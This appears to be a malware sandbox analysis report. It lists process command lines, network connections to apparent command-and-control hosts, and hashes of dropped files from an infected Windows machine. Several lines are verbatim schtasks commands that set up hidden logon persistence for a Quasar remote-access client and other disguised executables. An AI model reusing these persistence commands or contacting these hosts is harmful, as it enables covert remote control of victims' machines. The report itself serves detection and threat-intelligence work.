C:\Windows\SysWOW64\findstr.exe

findstr /V "Constitution" Wagon

C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe

"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe

"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe

"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe

"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X54ekAcmKbIv.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gubQos3ySnWn.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HtYfsW3vai5h.bat" "

C:\Windows\system32\chcp.com

chcp 65001

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
DE 5.252.155.72:80 5.252.155.72 tcp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
DE 185.208.159.240:8080 185.208.159.240 tcp
DE 185.208.159.240:8080 185.208.159.240 tcp
US 8.8.8.8:53 240.159.208.185.in-addr.arpa udp
US 8.8.8.8:53 72.155.252.5.in-addr.arpa udp
US 8.8.8.8:53 maerchen-beat-frei.ch udp
US 45.42.212.91:443 maerchen-beat-frei.ch tcp
CH 95.183.50.117:80 95.183.50.117 tcp
US 8.8.8.8:53 91.212.42.45.in-addr.arpa udp
US 8.8.8.8:53 117.50.183.95.in-addr.arpa udp
DE 185.208.159.240:56001 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fizzysu.sbs udp
DE 5.75.209.106:443 fizzysu.sbs tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 106.209.75.5.in-addr.arpa udp
TR 45.138.183.226:80 45.138.183.226 tcp
DE 5.75.209.106:443 fizzysu.sbs tcp
US 8.8.8.8:53 plunder.dedyn.io udp
TR 216.9.224.66:5000 plunder.dedyn.io tcp
HK 121.127.231.166:80 121.127.231.166 tcp
US 8.8.8.8:53 226.183.138.45.in-addr.arpa udp
US 8.8.8.8:53 66.224.9.216.in-addr.arpa udp
DE 5.75.209.106:443 fizzysu.sbs tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 166.231.127.121.in-addr.arpa udp
TR 45.138.183.226:80 45.138.183.226 tcp
CN 124.221.100.215:80 tcp
CY 213.133.94.133:4444 tcp
TR 45.138.183.226:80 45.138.183.226 tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 88.221.134.89:80 e5.o.lencr.org tcp
DE 147.45.44.131:80 147.45.44.131 tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 131.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 8.8.8.8:53 bash.mywire.org udp
US 192.188.88.248:2404 bash.mywire.org tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 bash1.accesscam.org udp
US 192.188.88.248:2404 bash1.accesscam.org tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
JP 8.209.212.26:7777 8.209.212.26 tcp
US 8.8.8.8:53 26.212.209.8.in-addr.arpa udp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
US 8.8.8.8:53 pastebin.com udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 10.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
N/A 224.0.0.251:5353 udp
CN 120.26.164.174:8088 tcp
US 8.8.8.8:53 252.215.42.69.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mail.mindfulinvoice.online udp
US 199.127.63.127:8041 mail.mindfulinvoice.online tcp
US 8.8.8.8:53 127.63.127.199.in-addr.arpa udp
DE 147.45.44.131:80 147.45.44.131 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 207.231.111.48:80 207.231.111.48 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 48.111.231.207.in-addr.arpa udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
RU 185.215.113.16:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 172.67.19.24:443 pastebin.com tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 thefashionist.top udp
US 104.21.80.1:443 thefashionist.top tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 impolitewearr.biz udp
US 8.8.8.8:53 toppyneedus.biz udp
US 172.67.149.66:443 toppyneedus.biz tcp
US 8.8.8.8:53 1.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 66.149.67.172.in-addr.arpa udp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 lightdeerysua.biz udp
US 8.8.8.8:53 suggestyuoz.biz udp
US 8.8.8.8:53 hoursuhouy.biz udp
US 8.8.8.8:53 mixedrecipew.biz udp
HK 45.192.96.63:6001 45.192.96.63 tcp
US 8.8.8.8:53 affordtempyo.biz udp
US 8.8.8.8:53 pleasedcfrown.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 yuriy-gagarin.com udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 104.21.82.94:443 yuriy-gagarin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 63.96.192.45.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 94.82.21.104.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 147.45.44.131:80 147.45.44.131 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
RU 185.215.113.16:80 tcp
FR 163.172.125.253:333 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.86.108.55:7771 tcp
RU 185.215.113.16:80 tcp
US 8.8.8.8:53 55.108.86.172.in-addr.arpa udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 172.67.19.24:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 72.167.39.236:443 tcp
US 8.8.8.8:53 236.39.167.72.in-addr.arpa udp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
RU 185.81.68.147:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
RU 185.81.68.147:80 tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 docs.google.com udp
GB 216.58.212.206:443 docs.google.com tcp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 8.8.8.8:53 206.212.58.216.in-addr.arpa udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.204.65:443 drive.usercontent.google.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 65.204.58.216.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
US 172.67.19.24:443 pastebin.com tcp
FR 90.113.178.145:9033 tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
DE 18.192.31.30:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
FR 90.113.178.145:9033 tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 clamfluffys.click udp
US 8.8.8.8:53 nearycrepso.shop udp
US 8.8.8.8:53 abruptyopsn.shop udp
US 8.8.8.8:53 wholersorie.shop udp
US 8.8.8.8:53 framekgirus.shop udp
US 8.8.8.8:53 tirepublicerj.shop udp
US 8.8.8.8:53 noisycuttej.shop udp
US 8.8.8.8:53 rabidcowse.shop udp
US 8.8.8.8:53 cloudewahsj.shop udp
US 8.8.8.8:53 steamcommunity.com udp
US 172.67.19.24:443 pastebin.com tcp
GB 23.214.143.155:443 steamcommunity.com tcp
FR 163.172.125.253:333 tcp
US 104.21.82.94:443 yuriy-gagarin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
US 172.67.19.24:443 pastebin.com tcp
RU 176.113.115.215:80 tcp
FR 90.113.178.145:9033 tcp
US 172.67.19.24:443 pastebin.com tcp
GB 20.26.156.215:443 github.com tcp
N/A 192.168.50.1:4782 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 cdn.glitch.me udp
IE 18.66.171.31:80 cdn.glitch.me tcp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 31.171.66.18.in-addr.arpa udp
US 8.8.8.8:53 bash1.accesscam.org udp
US 172.67.19.24:443 pastebin.com tcp
GB 20.26.156.215:80 github.com tcp
US 192.188.88.248:2404 bash1.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.153.198.123:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp

Files

memory/4556-0-0x0000000002240000-0x0000000002241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

MD5 69994ff2f00eeca9335ccd502198e05b
SHA1 b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256 2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512 ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

C:\ProgramData\Synaptics\Synaptics.exe

MD5 c6040234ee8eaedbe618632818c3b1b3
SHA1 68115f8c3394c782aa6ba663ac78695d2b80bf75
SHA256 bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
SHA512 a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

memory/5052-125-0x00007FF9F5883000-0x00007FF9F5885000-memory.dmp

memory/5052-129-0x00000000009B0000-0x00000000009B8000-memory.dmp

memory/4556-130-0x0000000000400000-0x00000000004C4000-memory.dmp

memory/3824-131-0x0000000000680000-0x0000000000681000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\1.exe

MD5 e7c964e5bd52da0b4ff1e6543608cf27
SHA1 b369051de7f7bdf58411fb604eef85507965abf2
SHA256 33cab7cd9069c761a907a2498c2d496da5e9332412b13472710e774ca80c4b48
SHA512 651dd8f2fc6c4e0c479a03111334b054a0ac0c466256e48880c5a27ce77ef0900bd9ccbe7c16607b1f4c9fa3efc4b387ddc3b371c415715025bc188fd218eb48

C:\Users\Admin\AppData\Local\Temp\a\test.exe

MD5 efeca930587b162098d0121673218cdc
SHA1 91d39b7b4e9292576d9ddceb40afbb5bb6609943
SHA256 b4448f550fbaec46867c680e96b06176ece5e46bfb691da0c538a6cb0adde23d
SHA512 0c209fbf54c6d6a8fd4291df488479eb1f6efbea09dfe1b66bbab32b4fec621ee9bec85421df574881f2c9ec67b2c88a32f1ae386a24b3682a1f07a3417e7db3

memory/2172-216-0x00000000008F0000-0x0000000000942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Update.exe

MD5 d51807a8c93634b39cce7611535167cf
SHA1 036570c14856214ffc1bc019588acb4f60fcb3dd
SHA256 ff2928f7e00c034f5d441f7b7444a8af961795f41c7a06e3fc7a6fbc9275f8ee
SHA512 b629b523407af2d865938111ab831ec79bd9bbf539dd636e42b648dee4637f109f095842cb90cea7d40bfcf2f2da684fd80956b72e4f94b385034823c8bf8179

memory/2172-229-0x0000000005130000-0x00000000051F4000-memory.dmp

memory/4356-230-0x0000000000BE0000-0x0000000000D38000-memory.dmp

memory/4356-233-0x0000000005570000-0x00000000056B8000-memory.dmp

memory/2172-232-0x0000000005870000-0x0000000005E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Universities

MD5 ea5bb74e17f13a38198f152786e83aad
SHA1 39d4cd7c660a4de6aaab32365c4d557bee3f1e14
SHA256 6d85d7c342a3ba28411fa4c69983cfceea5df9c70835444052704644edead06b
SHA512 35d659b2c0571b7bf1de8e108f534faf14c66a03b27c2c49a8fa07369af7709a54351daec57a08142389fab575fbaaa9109405ae82096ce69826b61fb1e096b0

memory/4356-237-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-241-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-259-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-257-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-255-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-253-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-251-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-247-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-296-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-315-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-330-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-327-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-319-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-313-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-305-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-303-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-301-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-299-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-294-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-292-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-290-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-288-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-286-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-285-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-282-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-280-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-266-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-245-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-243-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-239-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-236-0x0000000005570000-0x00000000056B3000-memory.dmp

memory/4356-249-0x0000000005570000-0x00000000056B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe

MD5 0de84329f55c53a3849789b399ee4ef5
SHA1 944fe6f17e0ddd91d93e1b50b2978e014347744c
SHA256 71ae00a7e95588f614e64c695aadc9c26cc22a12199528a6c76a6eb15e32ff8c
SHA512 4d516ad1843622cc711b4fd2a32d54fc6e4eba56eddd91c3b043678cde95f5623f09cb51d8bf3dcf180bbc368b4c4aca607e04fab1038c8b2f4a90493b6c4bc4

memory/3676-1944-0x0000000000B30000-0x0000000000B38000-memory.dmp

memory/3676-1946-0x0000000005340000-0x0000000005630000-memory.dmp

memory/4356-1947-0x0000000005760000-0x0000000005802000-memory.dmp

memory/3676-1949-0x0000000004EF0000-0x0000000004F12000-memory.dmp

memory/3676-1948-0x00000000050B0000-0x000000000513C000-memory.dmp

memory/4356-1951-0x00000000059D0000-0x0000000005A70000-memory.dmp

memory/4356-1953-0x0000000005970000-0x00000000059BC000-memory.dmp

memory/3676-1954-0x0000000005BE0000-0x0000000006184000-memory.dmp

memory/3676-1950-0x0000000005140000-0x00000000052EA000-memory.dmp

memory/2172-1988-0x0000000006610000-0x0000000006676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe

MD5 65cc23e7237f3cff2d206a269793772e
SHA1 fa3b354d2a7a4a673d4477ddcf1e1f2c93bb05fd
SHA256 a57a8a3c3c073632337bb870db56538ef3d3cebd1ada4c3ed2397ea73a6923fb
SHA512 7596ec7aeef7fcf446328dc928a835a54fa1060264b170baf2413252977bb0ac0b8da96867895530601cc098516e7bb82d1edbabfcfccd29d24619fe89f49613

memory/5036-2003-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4356-2007-0x0000000005C00000-0x0000000005C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe

MD5 ebf341ab1088ab009a9f9cf06619e616
SHA1 a31d5650c010c421fa81733e4841cf1b52d607d9
SHA256 7422bc2c77e70c2e90c27d030a13eb3adf0bcfc1ef2bc55b62871181af5cd955
SHA512 40c1481642f8ad2fed9514d0968a43151a189c61e53d60990183e81c16891cdd7a0983568b2910dc8a9098a408136468cff5660d0607cf06331275937c1f60e1

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi

MD5 ecc06a118f720330462c209f0f402c6f
SHA1 cf2b20e6ec3193dfe204eaa0a91240825357712e
SHA256 f20b397fe0b68b39221702ff216abe4403d51fda3049a100c46a345256f19003
